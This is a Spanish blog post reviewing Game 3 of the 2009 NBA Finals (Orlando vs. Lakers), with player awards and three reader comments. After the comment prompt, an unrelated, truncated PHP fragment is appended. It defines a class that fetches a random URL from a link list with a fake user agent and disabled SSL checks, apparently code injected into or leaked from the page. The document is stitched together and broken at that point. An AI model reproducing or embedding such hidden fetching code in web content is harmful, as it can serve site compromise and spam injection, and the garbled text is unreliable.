Finales 2009 (Game 3): Ángeles y demonios

10 de June de 2009 por TheDeerHunter

Espectáculo impresionante el que se vio anoche en el Amway Arena de Orlando. Primera victoria en finales en la corta historia de la franquicia local y además, de la mejor manera posible, batiendo marcas de acierto y jugando francamente bien. Hablamos de ángeles y de demonios porque anoche fuimos testigos de redenciones destacadas y algún que otro descenso a los infiernos.

El primero de todos, Rafer Alston, al que ya dábamos por perdido, que sacó un coraje casi inhumano teniendo en cuenta todo lo que le ha caído. Probablemente la clave de volver con un 2-0 en contra a casa. Jugó como un auténtico demonio pero será elevado a los altares de la franquicia tras este partido. Descaro propio de una leyenda de playground como es él y un nivel de autoexigencia y concentración que no le conocíamos, esta vez con el beneplácito de Van Gundy. Fisher volvió a evidenciar dificultades defensivas graves y sólo fue capaz de perseguir inútilmente al base local por toda la cancha.

No fue, sin embargo, la noche de Kobe. Parecía que la iba a armar con un primer cuarto prodigioso, pero el descanso al principio del segundo le sentó mal y cuando intentaba meterse en el partido se enredó en un infantil pique con Lee, degenerando en una segunda parte desastrosa, con un 50% en tiros libres que lo dice todo y una serie interminable de errores impropios en el último cuarto que condenó a su equipo. Pietrus, quién iba a decirlo, se lo comió vivo en los instantes decisivos, culminando su heroica actuación con un robo al propio Bryant a medio minuto del final que sentenciaba el 2-1 final.

“Supermán” Howard desintegró la frustración acumulada en los dos primeros partidos convirtiéndose en el eje del extraordinario Pick&Roll que anoche explotaron los Magic. La novedad del partido de anoche es que no era él la opción prioritaria de la jugada, sinó que se convirtió en un mero medio de generar desequilibrios por fuera, desde donde ayer acribillaron a los Lakers. En ese rol “secundario” se sintió como pez en el agua, sacando infinidad de faltas que supo rentabilizar desde la línea de forma óptima. A su alrededor, Turkoglu hizo y deshizo con maestría y Lewis, sin tanto brillo como en el segundo, aportó lo justo para concluir un partido brillante a su favor.

Por los Lakers la defensa no encontró soluciones. Gasol no fue el titán que vimos en los dos primeros y ni Ariza ni Odom significaron ese tercer hombre que necesitan los Lakers como el comer. Sólo pudimos apreciar un ligero atisbo de mejora en Farmar… pero era precísamente en los minutos en los que echábamos de menos que Shannon Brown pisara un parquet que no llegaría a tocar.

Con todo, partidazo de Orlando y bastante discreto de Lakers… pero aún así se resolvió por el canto de un duro, en un accidente de Kobe de los que suceden una vez en la vida. El 2-1 no cambia demasiadas cosas en el planteamiento de los de Phil Jackson, pero no deben olvidar que Orlando vuelve a sentirse dentro de la eliminatoria y que no será fácil disponer de oportunidades tan claras como la que se ha escapado esta noche. El siguiente choque en la madrugada del jueves al viernes.

PREMIOS TJNBA

MVP: Turkoglu fue el hombre orquesta de Orlando y de su cerebro y manos se gestó el imparable juego ofensivo de Orlando. Sin embargo de nada hubiera servido sin el referente de Howard en la pintura, tanto ofensiva como defensivamente. Lo de la mejora en los tiros libres del “mejor pívot de la liga” roza lo sobrenatural.

La sorpresa: Ya no contábamos con Alston para siquiera anotar algún tiro abierto. Anoche pidió protagonismo, se las jugó con un par… y le salió perfecto. Premio compartido con Pietrus que por fin hizo daño a un Kobe desquiciado. ¿Qué hubiera pasado si no llega a robar ese balón a 30 segundos del final?

La decepción: Kobe estuvo desacertadísimo. Casi se podría decir que él mismo tiró el partido al desagüe por empecinarse en absorber juego. Él es el líder y como tal el principal responsable de no permitir este tipo de errores, ni siquiera a él mismo… y sin embargo, también hay que decir que se dejó la vida por el equipo, de un modo equivocado sí, pero nadie podrá decir que no se esforzó buscando la victoria. Se puede jugar mal, pero la actitud es lo primero y de esa falta difícilmente podremos acusar a Kobe. Premio al mayor esfuerzo en vano también para él.

Comenta

3 comentarios a esta entrada

  1. univerzee dice:
    #1

    Totalmente de acuerdo, sólo liberar un poquito de carga a Kobe… porque ORL lo hizo como dices bien bien, así que tenían que ganar.

      Citar

  2. Viva_Dirk dice:
    #2

    Estos errores de Kobe si que no me parecen asumibles(respecto a lo que hablabamos ayer de Redick), lo de los tiros libres es una cosa que no recuerdo en ningun jugador de su nivel.

      Citar

  3. PIRATA dice:
    #3

    Por fin los americanos empiezan a reconocer a Pau!!!!!!
    He hechado un vistazo por algun foro de Los Angeles y a parte del debate con Kobe (como aqui) la gente saca datos como que L.A. no ha perdido tres partidos seguidos desde que llegó Pau en febrero’08 y referentes al debate Kobe hay batantes que recuerdan que después de destruir el equipo en 2004 el solito no ha hecho nada, solo con el cambio de actitud y la llegada de Pau los L.A. han llegado a dos finales.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>